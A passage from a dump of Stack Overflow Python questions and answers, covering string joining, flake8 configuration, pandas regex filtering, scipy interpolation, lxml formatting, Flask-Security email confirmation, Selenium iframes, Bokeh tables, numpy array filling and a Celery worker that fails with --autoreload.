host=host+str(v)+str(i.pop())
host=host[:-1]
print host
</code></pre>
<p>I'm trying to get <code>'0.0.0.0:0000'</code></p>
<p>But instead I get: <code>IndexError: pop from empty list</code></p>
<p><a href="https://repl.it/DirH/1" rel="nofollow">https://repl.it/DirH/1</a></p>
<p>The reason I ask is that I can't find any SO questions where the list is symbols <strong>and</strong> the list is declared in plain writing!</p>
| 3 | 2016-09-27T19:14:46Z | 39,733,220 | <p>It seems what you want is simple: join everything using the dot, but the last part, the port number must be joined by colon. Here is another way to do it:</p>
<pre><code>port = sys.argv.pop()
host = '{}:{}'.format('.'.join(sys.argv[1:]), port)
</code></pre>
| 0 | 2016-09-27T19:54:00Z | [
"python"
]
|
Atom editor - linter-flake8: how to specify global "builtins" to ignore | 39,732,615 | <p>I've installed the <a href="https://atom.io/packages/linter-flake8" rel="nofollow">linter-flake8</a> Atom package, and keep getting the following warnings:</p>
<pre><code>F821 â undefined name 'self' at line __ col _
</code></pre>
<p>Following <a href="http://stackoverflow.com/questions/37840142/how-to-avoid-flake8s-f821-undefined-name-when-has-been-installed-by-get">this</a> question, is there a way to specify <code>builtins="self"</code> in Atom?<br>
I can't seem to find it. And if not, is there a workaround?</p>
| 1 | 2016-09-27T19:15:29Z | 39,732,679 | <p>there is a special file which you require in your home directory (or per project basis) called a flake8 file.</p>
<p>For a global version, if not already existing create a file located at ~/.config/flake8</p>
<p>Within this directory add all your customizations, my flake8 file looks like this for example:</p>
<pre><code>[flake8]
max-line-length = 120
ignore = W293, E402
</code></pre>
<p>So for your's you'd probably wish to do something similar, with ignore=F821. </p>
<p>For a per project version please see the flake8 documentation on configuration:</p>
<p><a href="http://flake8.pycqa.org/en/latest/user/configuration.html" rel="nofollow">http://flake8.pycqa.org/en/latest/user/configuration.html</a></p>
<p>within the page they highlight a number of possible configuration locations. Good luck!</p>
| 0 | 2016-09-27T19:20:07Z | [
"python",
"atom-editor",
"flake8"
]
|
Pandas - how to filter rows base on regular expresion | 39,732,661 | <p>Can you please let me know how to filter rows using Pandas base on character range like [0-9] or [A-Z].</p>
<p>case like this where all the column types are objects</p>
<pre><code>A B
2.3 234
4.5 4b6
7b 275
</code></pre>
<p>I would like to check if all the values in the column A are floats meaning contains [0-9] and '.' ?
I'm aware of pd.to_numeric, applymap, isreal, isdigit etc but this is object column before I convert it to any numeric I would like to know the scale of the problem for non float vlues.</p>
<p>and which rows in dataset contains chars other than [0-9]</p>
<p>Thanks in advance
E</p>
| 1 | 2016-09-27T19:18:56Z | 39,732,839 | <p>try this:</p>
<pre><code>In [8]: df
Out[8]:
A B
0 2.3 234
1 4.5 4b6
2 7b 275
3 11 11
In [9]: df.A.str.match(r'^\d*\.*\d*$')
Out[9]:
0 True
1 True
2 False
3 True
Name: A, dtype: bool
In [10]: df.ix[df.A.str.match(r'^\d*\.*\d*$')]
Out[10]:
A B
0 2.3 234
1 4.5 4b6
3 11 11
</code></pre>
| 0 | 2016-09-27T19:29:13Z | [
"python",
"pandas",
"dataframe"
]
|
Python scipy.interpolate.interp1d not working with large float values | 39,732,724 | <p>I am trying to use <code>scipy.interpolate.interp1d</code>to plot longitude and latitude values to x-coordinate and y-coordinate pixels of a map image. I have sample values:</p>
<pre><code>y = [0, 256, 512, 768, 1024, 1280, 1536]
lat = [615436414755, 615226949459, 615017342897, 614807595000, 614597705702, 614387674936, 614177502635]
x = [0, 256, 512, 768, 1024, 1280, 1536, 1792, 2048, 2304]
lon = [235986328125, 236425781250, 236865234375, 237304687500, 237744140625, 238183593750, 238623046875, 239062500000, 239501953125, 239941406250]
</code></pre>
<p>when I pass to the function like this:</p>
<pre><code>xInterpolation = interp1d(xDegree, xPixel)
yInterpolation = interp1d(yDegree, yPixel)
return (int(xInterpolation(lon)),int(yInterpolation(lat)))
</code></pre>
<p>I get value error:</p>
<blockquote>
<p>ValueError("A value in x_new is above the interpolation " ValueError: A value in x_new is above the interpolation range.</p>
</blockquote>
<p>No matter what value I try, it throws value error, I have even tried giving the same lat or lon values that are in the input list but that didn't work either. Does anybody know whats happening here? Or if I am using the wrong Interpolation. </p>
| 0 | 2016-09-27T19:22:16Z | 39,734,259 | <p>From <code>interp1d</code> <a href="http://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.interpolate.interp1d.html" rel="nofollow">docs</a>:</p>
<blockquote>
<p>bounds_error : bool, optional If True, a ValueError is raised any time
interpolation is attempted on a value outside of the range of x (where
extrapolation is necessary). If False, out of bounds values are
assigned fill_value. By default, an error is raised.</p>
</blockquote>
<p>So, some of yours interpolated data is above interpolation bound. You are trying to extrapolate, not interpolate. </p>
<p>When you use interpolation like </p>
<p><code>xInterpolation = interp1d(xDegree, xPixel)
xInterpolation(lon)</code></p>
<p>all values from <code>lon</code> must belong to the interval <code>[xDegree.min, xDegree.max]</code>.</p>
<p>So, you need to correct your data for interpolation or use <a href="http://stackoverflow.com/questions/2745329/how-to-make-scipy-interpolate-give-an-extrapolated-result-beyond-the-input-range">extrapolation</a>.</p>
| 1 | 2016-09-27T21:02:26Z | [
"python",
"scipy",
"interpolation"
]
|
Pythonl lxml adding linebreak between specific nodes when creating xml file | 39,732,757 | <p>I am writing an XML file using lxml. I am able to write the entire XML file to one line:</p>
<pre><code><FIXML><Batch Total="3"><Hdr SendTime="2016-09-27T13:32:19-05:00"/><RepeatingNode Price="0.99" RptID="1"><Date Dt="2016-09-20"/></RepeatingNode><RepeatingNode Price="2.49" RptID="2"><Date Dt="2016-09-20"/></RepeatingNode><RepeatingNode Price="0.25" RptID="3"><Date Dt="2016-09-20"/></RepeatingNode></Batch></FIXML>
</code></pre>
<p>and I am able to pretty_print it using the pretty_print parameter:</p>
<pre><code><FIXML>
<Batch Total="3">
<Hdr SendTime="2016-09-27T13:32:19-05:00"/>
<RepeatingNode Price="0.99" RptID="1">
<Date Dt="2016-09-20"/>
</RepeatingNode>
<RepeatingNode Price="2.49" RptID="2">
<Date Dt="2016-09-20"/>
</RepeatingNode>
<RepeatingNode Price="0.25" RptID="3">
<Date Dt="2016-09-20"/>
</RepeatingNode>
</Batch>
</FIXML>
</code></pre>
<p>However, I would like to write to my file and add a linebreak only after each ReapeatingNode. I would also like to avoid any indentation. My ideal output file would look like this:</p>
<pre><code><FIXML>
<Batch Total="3">
<Hdr SendTime="2016-09-27T13:32:19-05:00"/>
<RepeatingNode Price="0.99" RptID="1"><Date Dt="2016-09-20"/></RepeatingNode>
<RepeatingNode Price="2.49" RptID="2"><Date Dt="2016-09-20"/></RepeatingNode>
<RepeatingNode Price="0.25" RptID="3"><Date Dt="2016-09-20"/></RepeatingNode>
</Batch>
</FIXML>
</code></pre>
<p>Below is the framework for my code:</p>
<pre><code>import lxml.etree as et
fixml_node = et.Element("FIXML")
batch_node = et.SubElement(fixml_node, "Batch")
et.SubElement(batch_node, "Hdr")
for row in data:
repeating_node = et.SubElement(batch_node, "RepeatingNode")
et.SubElement(repeating_node, "Date")
complete_new_file = et.ElementTree(fixml_node)
complete_new_file.write("output_file")
# or below when pretty-printing
complete_new_file.write("output_file", pretty_print=True)
</code></pre>
<p>Any suggestions how I can achieve my desired output?</p>
| 0 | 2016-09-27T19:24:42Z | 39,734,229 | <p>My solution is to ignore the pretty_print param and add a text or tail with a linebreak where applicable. New code below:</p>
<pre><code>import lxml.etree as et
fixml_node = et.Element("FIXML")
fixml_node.text = "\n"
batch_node = et.SubElement(fixml_node, "Batch")
batch_node.text = "\n"
batch_node.tail = "\n"
header_node = et.SubElement(batch_node, "Hdr")
header_node.tail = "\n"
for row in data:
repeating_node = et.SubElement(batch_node, "RepeatingNode")
repeating_node.tail = "\n"
et.SubElement(repeating_node, "Date")
complete_new_file = et.ElementTree(fixml_node)
complete_new_file.write("output_file")
</code></pre>
<p>This is an easy way to customize the positioning of linebreaks throughout the file. I'll leave this question open for a day or two to see if anyone has a better solution.</p>
| 0 | 2016-09-27T21:00:51Z | [
"python",
"xml",
"lxml"
]
|
No confirmation link in flask security | 39,732,768 | <p>I am using flask_security to do registration in a flask app. When registering an email address an confirmation mail is sent, but it does not include a confirmation link.</p>
<p>I did not find an option to activate this and there is not much documentation about it.</p>
<p>The current configuration is</p>
<pre><code>app = Flask(__name__)
app.config["DEBUG"] = True
app.config["SECRET_KEY"] = "..."
app.config["SECURITY_REGISTERABLE"] = True
app.config["SECURITY_RECOVERABLE"] = True
app.config["SECURITY_TRACKABLE"] = True
app.config["SECURITY_CHANGEABLE"] = True
app.config["SECURITY_PASSWORD_HASH"] = "sha512_crypt"
app.config["SECURITY_PASSWORD_SALT"] = "..."
app.config["SECURITY_CONFIRM_LOGIN_WITHOUT_CONFIRMATION"] = False
app.config["MAIL_SERVER"] = "smtp.gmail.com"
app.config["MAIL_PORT"] = 465
app.config["MAIL_USE_SSL"] = True
app.config["MAIL_USERNAME"] = "..."
app.config["MAIL_PASSWORD"] = "..."
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:////tmp/flaskpage.db"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
</code></pre>
| 0 | 2016-09-27T19:25:20Z | 39,733,031 | <p>You've not set all the settings that should. From the <a href="https://pythonhosted.org/Flask-Security/configuration.html#feature-flags" rel="nofollow">docs</a></p>
<blockquote>
<p><code>SECURITY_CONFIRMABLE</code></p>
<p>Specifies if users are required to confirm their email address when registering a new account. If this value is True, Flask-Security creates an endpoint to handle confirmations and requests to resend confirmation instructions. The URL for this endpoint is specified by the <code>SECURITY_CONFIRM_URL</code> configuration option. Defaults to <code>False</code>.</p>
</blockquote>
<p>You can also look at the code, it actually uses it value to register your user. From <a href="https://github.com/mattupstate/flask-security/blob/develop/flask_security/registerable.py#L26-L41" rel="nofollow">source code</a></p>
<blockquote>
<pre><code>confirmation_link, token = None, None
...
if _security.confirmable:
confirmation_link, token = generate_confirmation_link(user)
do_flash(*get_message('CONFIRM_REGISTRATION', email=user.email))
</code></pre>
</blockquote>
<p>So because of <code>SECURITY_CONFIRMABLE</code> is not set, and its default is <code>False</code> you are getting no link.</p>
| 1 | 2016-09-27T19:41:43Z | [
"python",
"flask",
"flask-security"
]
|
Selenium Python : Unable to get element by id/name/css selector | 39,732,777 | <p>For a school project, I'm trying to create a Python Script which is able to fill in different forms, from different websites.</p>
<p>Here is the thing, for some kinds of website, I'm not able to catch the form elements which Selenium.
E.g. in this website : <a href="http://www.top-office.com/jeu" rel="nofollow">http://www.top-office.com/jeu</a>
Where I inspect the page with firefox, the input "Name" box has the id "lastname", but Selenium is not able to get it. And when I display the html code of this page, the form looks like being included from another page or something.</p>
<p>I tried to getelementbyid, byname, bycssselector, etc.
I also tried to wait for the page to be entirely loaded by using WebDriverWait(driver, 5), but it still do not work.</p>
<p>Do you have any solutions or suggestions ?</p>
<p>PS : Even with javascript, I'm not able to get this element by id</p>
<p>Thanks</p>
| 1 | 2016-09-27T19:26:11Z | 39,732,968 | <p>The element that you are trying to interact with is inside of an iframe. You need to use the <code>driver.switch_to_frame()</code> method in order to switch the driver to focus on that iframe. Only when it has switched into that iframe can it interact with its elements. </p>
<p>See <a href="http://stackoverflow.com/questions/7534622/selecting-an-iframe-using-python-selenium">this post</a> on how to use it. You can locate the iframe using xpath, like this: <code>//iframe[@src = 'https://adbx.me/grandjeuclubmed/']</code>. Then, you can use the code mentioned in the post I gave you.</p>
| 1 | 2016-09-27T19:37:19Z | [
"javascript",
"jquery",
"python",
"selenium"
]
|
Python Bokeh table columns and headers don't line up | 39,732,842 | <p>I am trying to display a table in a jupyter notebook using python and the visualization library <a href="http://bokeh.pydata.org/en/0.10.0/index.html">Bokeh</a>. I use the following code to display my table in an jupyter notebook where <strong>result</strong> is a dataframe:</p>
<pre><code>source = ColumnDataSource(result)
columns = [
TableColumn(field="ts", title="Timestamp"),
TableColumn(field="bid_qty", title="Bid Quantity"),
TableColumn(field="bid_prc", title="Bid Price"),
TableColumn(field="ask_prc", title="Ask Price"),
TableColumn(field="ask_qty", title="Ask Quantity"),
]
data_table = DataTable(source=source, columns=columns, fit_columns=True, width=1300, height=800)
show(widgetbox([data_table], sizing_mode = 'scale_both'))
</code></pre>
<p>Previously I was using vform although this now seems to be depreciated and no longer works as expected either. This occurred after my jupyter notebook version was updated. Regardless of what I set the width my column headers don't line up and have a weird overlap with the table:</p>
<p><a href="http://i.stack.imgur.com/aHAL0.png"><img src="http://i.stack.imgur.com/aHAL0.png" alt="enter image description here"></a></p>
<p>This did not happen before, I was able to get a nice table where everything lined up. Even if I adjust the headers they still wont line up. This does not happen when I save the table as an html file instead of calling show() directly in the Jupyter notebook. What do I need to change? Is there a better way to do this?</p>
<p><strong>Full Example</strong></p>
<pre><code>from bokeh.io import show, output_notebook
from bokeh.layouts import widgetbox
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import TableColumn, DataTable
import pandas as pd
output_notebook()
d = {'one' : pd.Series([1., 2., 3.], index=['a', 'b', 'c']),
'two' : pd.Series([1., 2., 3., 4.], index=['a', 'b', 'c', 'd'])}
df = pd.DataFrame(d)
source = ColumnDataSource(df)
columns = [
TableColumn(field="one", title="One"),
TableColumn(field="two", title=" Two"),
]
data_table = DataTable(source=source, columns=columns,
fit_columns=True, width=800, height=800)
show(widgetbox([data_table], sizing_mode = 'scale_both'))
</code></pre>
<p>This is running on a system with the following versions:</p>
<ul>
<li>Jupyter 4.2.0 </li>
<li>Python 2.7.12 (Anaconda 2.3.0 64 bit)</li>
<li>Bokeh 0.12.2</li>
</ul>
| 7 | 2016-09-27T19:29:22Z | 39,897,690 | <p>The css styling of Bokeh widgets for Jupyter notebooks is in <a href="http://cdn.pydata.org/bokeh/release/bokeh-widgets-0.12.0.min.css" rel="nofollow">http://cdn.pydata.org/bokeh/release/bokeh-widgets-0.12.0.min.css</a>, where <code>height:16px</code> for elements <code>.bk-root .bk-slick-header-column.bk-ui-state-default</code> is hardcoded. So it cannot be changed without changing the css. </p>
<p>It can be styled adhock by <code>HTML</code> function</p>
<pre><code>from IPython.core.display import HTML
HTML("""
<style>
.bk-root .bk-slick-header-column.bk-ui-state-default {
height: 25px!important;
}
</style>
""")
</code></pre>
<p>For the persistent change css can be added to <code>custom</code> directory in Jupyter config. You can figure out where it is by calling </p>
<pre><code>jupyter --config-dir
</code></pre>
<p>By default it is <code>~/.jupyter</code>
The new css need to be in <code>~/.jupyter/custom/custom.css</code> then.</p>
<p>Before<a href="http://i.stack.imgur.com/2vyXx.png" rel="nofollow"><img src="http://i.stack.imgur.com/2vyXx.png" alt="enter image description here"></a></p>
<p>After<a href="http://i.stack.imgur.com/a7EAU.png" rel="nofollow"><img src="http://i.stack.imgur.com/a7EAU.png" alt="enter image description here"></a></p>
| 2 | 2016-10-06T13:43:39Z | [
"python",
"ipython",
"jupyter",
"bokeh"
]
|
Numpy array manipulation within range of columns and rows | 39,732,957 | <p>I have a numpy boolean 2D array that represents a grayscale image which is essentially an unfilled shape (triangle, square, circle) consisting of <code>True</code> for white pixels, and <code>False</code> for black pixels. I would like to add a black fill by modifying the white pixels to black pixels.</p>
<pre><code>array([[True, True, True, False, False, False, False, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, False, False, False, False, True, True, True]])
</code></pre>
<p>(The 9 <code>True</code> values in a square in the middle of this array should become <code>False</code>.)</p>
<p>Is there a numpy slice method that will make this easy/fast? Something that I can modify all <code>True</code>s anytime there's a <code>False</code> followed by a <code>True</code> until the next instance of a <code>False</code>?</p>
| 2 | 2016-09-27T19:36:24Z | 39,733,198 | <p>Based on your logic, you can replace all values between the first False and the last False with False:</p>
<pre><code>def mutate(A):
ind = np.where(~A)[0]
if len(ind) != 0:
A[ind.min():ind.max()] = False
return A
np.apply_along_axis(mutate, 1, arr)
# array([[ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True]], dtype=bool)
</code></pre>
| 0 | 2016-09-27T19:52:00Z | [
"python",
"arrays",
"performance",
"numpy"
]
|
Numpy array manipulation within range of columns and rows | 39,732,957 | <p>I have a numpy boolean 2D array that represents a grayscale image which is essentially an unfilled shape (triangle, square, circle) consisting of <code>True</code> for white pixels, and <code>False</code> for black pixels. I would like to add a black fill by modifying the white pixels to black pixels.</p>
<pre><code>array([[True, True, True, False, False, False, False, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, False, False, False, False, True, True, True]])
</code></pre>
<p>(The 9 <code>True</code> values in a square in the middle of this array should become <code>False</code>.)</p>
<p>Is there a numpy slice method that will make this easy/fast? Something that I can modify all <code>True</code>s anytime there's a <code>False</code> followed by a <code>True</code> until the next instance of a <code>False</code>?</p>
| 2 | 2016-09-27T19:36:24Z | 39,733,436 | <p>Here one idea that's easy to implement and should perform reasonably quickly.</p>
<p>I'll use 0s and 1s so it's a little clearer to look at.</p>
<p>Here's the starting array:</p>
<pre><code>>>> a
array([[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1],
[1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1],
[1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1]])
</code></pre>
<p>Accumulate left-to-right using <code>np.logical_and.accumulate</code>, flip left-to-right, do the same again, flip back, and the "or" the two arrays together:</p>
<pre><code>>>> andacc = np.logical_and.accumulate
>>> (andacc(a, axis=1) | andacc(a[:, ::-1], axis=1)[:, ::-1]).astype(int)
array([[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1]])
</code></pre>
<p>(Leave out <code>.astype(int)</code> to keep a boolean array instead of 0s and 1s.)</p>
<p>Here's a triangle:</p>
<pre><code>>>> b
array([[1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1],
[1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0]])
>>> (andacc(b, axis=1) | andacc(b[:, ::-1], axis=1)[:, ::-1]).astype(int)
array([[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
</code></pre>
| 1 | 2016-09-27T20:08:52Z | [
"python",
"arrays",
"performance",
"numpy"
]
|
Celery Beat - Worker Consuming Messages, But Never Acks. Them | 39,732,967 | <p>I've got a simple Django site that I'd like to add some scheduled tasks to via Celery / RabbitMQ. I'm stuck, because, while the beat scheduler pumps out tasks with no issues, the worker fails to consume them. The worker never marks them as acknowledged in RabbitMQ.</p>
<p>Here's my Celery configuration from <code>ego.settings</code>;</p>
<pre><code>from celery.schedules import crontab
...
# Celery configuration
BROKER_URL = os.environ.get('BROKER_URL', 'amqp://guest:guest@localhost:5672')
CELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', 'disabled')
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
'account-notifications': {
'task': 'ego.celery.account_alerts',
'schedule': crontab(),
},
}
</code></pre>
<p>My celery entrypoint (<code>ego.celery</code>;</p>
<pre><code>from __future__ import absolute_import
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ego.settings')
from django.conf import settings
app = Celery('ego')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
@app.task
def account_alerts():
print("nothing here, yet")
</code></pre>
<p>No, I didn't forget <code>ego.__init__</code> :)</p>
<pre><code>from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
</code></pre>
<p>The logs from beat look normal, but the worker is very quiet.</p>
<p>Beat instance:</p>
<pre><code>$ celery -A ego beat -s /tmp/celerybeat-schedule`
celery beat v3.1.23 (Cipater) is starting.
__ - ... __ - _
Configuration ->
. broker -> amqp://guest:**@localhost:5672//
. loader -> celery.loaders.app.AppLoader
. scheduler -> celery.beat.PersistentScheduler
. db -> /Users/pnovotnak/Documents/Cyrus/ego/ego/celerybeat-schedule
. logfile -> [stderr]@%INFO
. maxinterval -> now (0s)
[2016-09-27 19:14:07,463: INFO/MainProcess] beat: Starting...
[2016-09-27 19:14:07,486: INFO/MainProcess] Scheduler: Sending due task account-notifications (ego.celery.account_alerts)
</code></pre>
<p>Worker instance:</p>
<pre><code>$ celery --autoreload -A ego worker -l debug
[2016-09-27 19:14:59,626: DEBUG/MainProcess] | Worker: Preparing bootsteps.
[2016-09-27 19:14:59,630: DEBUG/MainProcess] | Worker: Building graph...
[2016-09-27 19:14:59,630: DEBUG/MainProcess] | Worker: New boot order: {Beat, Timer, Hub, Queues (intra), Pool, Autoreloader, StateDB, Autoscaler, Consumer}
[2016-09-27 19:14:59,645: DEBUG/MainProcess] | Consumer: Preparing bootsteps.
[2016-09-27 19:14:59,646: DEBUG/MainProcess] | Consumer: Building graph...
[2016-09-27 19:14:59,652: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Events, Heart, Mingle, Gossip, Agent, Tasks, Control, event loop}
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Hub
[2016-09-27 19:14:59,655: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Pool
[2016-09-27 19:14:59,655: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Autoreloader
[2016-09-27 19:14:59,655: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Consumer
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Consumer: Starting Connection
[2016-09-27 19:14:59,663: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'product': 'RabbitMQ', 'platform': 'Erlang/OTP', 'version': '3.6.5', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'cluster_name': 'rabbit@d78e61a6690d', 'capabilities': {'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'per_consumer_qos': True, 'basic.nack': True, 'direct_reply_to': True, 'connection.blocked': True, 'consumer_priorities': True, 'publisher_confirms': True, 'consumer_cancel_notify': True}}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 19:14:59,664: DEBUG/MainProcess] Open OK!
[2016-09-27 19:14:59,664: INFO/MainProcess] Connected to amqp://guest:**@127.0.0.1:5672//
[2016-09-27 19:14:59,664: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,664: DEBUG/MainProcess] | Consumer: Starting Events
[2016-09-27 19:14:59,673: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'product': 'RabbitMQ', 'platform': 'Erlang/OTP', 'version': '3.6.5', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'cluster_name': 'rabbit@d78e61a6690d', 'capabilities': {'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'per_consumer_qos': True, 'basic.nack': True, 'direct_reply_to': True, 'connection.blocked': True, 'consumer_priorities': True, 'publisher_confirms': True, 'consumer_cancel_notify': True}}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 19:14:59,674: DEBUG/MainProcess] Open OK!
[2016-09-27 19:14:59,674: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 19:14:59,675: DEBUG/MainProcess] Channel open
[2016-09-27 19:14:59,676: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,677: DEBUG/MainProcess] | Consumer: Starting Heart
[2016-09-27 19:14:59,678: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,679: DEBUG/MainProcess] | Consumer: Starting Mingle
[2016-09-27 19:14:59,679: INFO/MainProcess] mingle: searching for neighbors
[2016-09-27 19:14:59,679: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 19:14:59,680: DEBUG/MainProcess] Channel open
[2016-09-27 19:15:00,694: INFO/MainProcess] mingle: all alone
[2016-09-27 19:15:00,695: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,695: DEBUG/MainProcess] | Consumer: Starting Gossip
[2016-09-27 19:15:00,695: DEBUG/MainProcess] using channel_id: 2
[2016-09-27 19:15:00,696: DEBUG/MainProcess] Channel open
[2016-09-27 19:15:00,700: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,701: DEBUG/MainProcess] | Consumer: Starting Tasks
[2016-09-27 19:15:00,704: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,704: DEBUG/MainProcess] | Consumer: Starting Control
[2016-09-27 19:15:00,704: DEBUG/MainProcess] using channel_id: 3
[2016-09-27 19:15:00,705: DEBUG/MainProcess] Channel open
[2016-09-27 19:15:00,708: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,708: DEBUG/MainProcess] | Consumer: Starting event loop
[2016-09-27 19:15:00,709: WARNING/MainProcess] celery@Slug.local ready.
[2016-09-27 19:15:00,709: DEBUG/MainProcess] | Worker: Hub.register Autoreloader...
</code></pre>
<p>Here's the RabbitMQ admin view;</p>
<p><a href="http://i.stack.imgur.com/BldOa.png" rel="nofollow"><img src="http://i.stack.imgur.com/BldOa.png" alt="rabbitmq admin interface screenshot"></a></p>
<p>And that's it. Nothing after that. Obligatory additional software versions;</p>
<ul>
<li>RabbitMQ 3.6.5 (Erlang 19.0.7)</li>
<li>Python 3.5.2</li>
</ul>
<p>And finally, the contents of one of the queued messages;</p>
<pre><code>{
"args": [],
"callbacks": null,
"chord": null,
"errbacks": null,
"eta": null,
"expires": null,
"id": "c474852a-dd60-4027-959d-5a9436337b17",
"kwargs": {},
"retries": 0,
"task": "ego.celery.account_alerts",
"taskset": null,
"timelimit": [
null,
null
],
"utc": true
}
</code></pre>
| 0 | 2016-09-27T19:37:09Z | 39,734,068 | <p>I've found the solution! It's the <code>--autoreload</code> flag. Don't use it.</p>
<p>Lesson #2: Run celery by hand, not via invoke as I was doing. This just makes your life harder by doing bad things to the log output.</p>
<p>It seems the <code>--autoreload</code> flag causes the worker to break for some reason. Here's a comparison of the logs with the flag present / not.</p>
<p>In the following outputs I've changed the task to <code>return "nothing here, yet"</code> rather than <code>print()</code> it.</p>
<p>With <code>--autoreload</code>; </p>
<pre><code>$ celery --autoreload -A ego worker -l debug
[2016-09-27 20:43:15,106: DEBUG/MainProcess] | Worker: Preparing bootsteps.
[2016-09-27 20:43:15,109: DEBUG/MainProcess] | Worker: Building graph...
[2016-09-27 20:43:15,110: DEBUG/MainProcess] | Worker: New boot order: {Timer, Hub, Queues (intra), Pool, Autoscaler, Autoreloader, Beat, StateDB, Consumer}
[2016-09-27 20:43:15,115: DEBUG/MainProcess] | Consumer: Preparing bootsteps.
[2016-09-27 20:43:15,115: DEBUG/MainProcess] | Consumer: Building graph...
[2016-09-27 20:43:15,122: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Events, Mingle, Tasks, Control, Agent, Gossip, Heart, event loop}
-------------- celery@Slug.local v3.1.23 (Cipater)
---- **** -----
--- * *** * -- Darwin-16.0.0-x86_64-i386-64bit
-- * - **** ---
- ** ---------- [config]
- ** ---------- .> app: ego:0x10486f748
- ** ---------- .> transport: amqp://guest:**@localhost:5672//
- ** ---------- .> results: disabled://
- *** --- * --- .> concurrency: 8 (prefork)
-- ******* ----
--- ***** ----- [queues]
-------------- .> celery exchange=celery(direct) key=celery
[tasks]
. celery.backend_cleanup
. celery.chain
. celery.chord
. celery.chord_unlock
. celery.chunks
. celery.group
. celery.map
. celery.starmap
. ego.celery.account_alerts
. ledger.tasks.AccountAlerts
[2016-09-27 20:43:15,125: DEBUG/MainProcess] | Worker: Starting Hub
[2016-09-27 20:43:15,125: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,125: DEBUG/MainProcess] | Worker: Starting Pool
[2016-09-27 20:43:15,409: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,410: DEBUG/MainProcess] | Worker: Starting Autoreloader
[2016-09-27 20:43:15,410: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,410: DEBUG/MainProcess] | Worker: Starting Consumer
[2016-09-27 20:43:15,410: DEBUG/MainProcess] | Consumer: Starting Connection
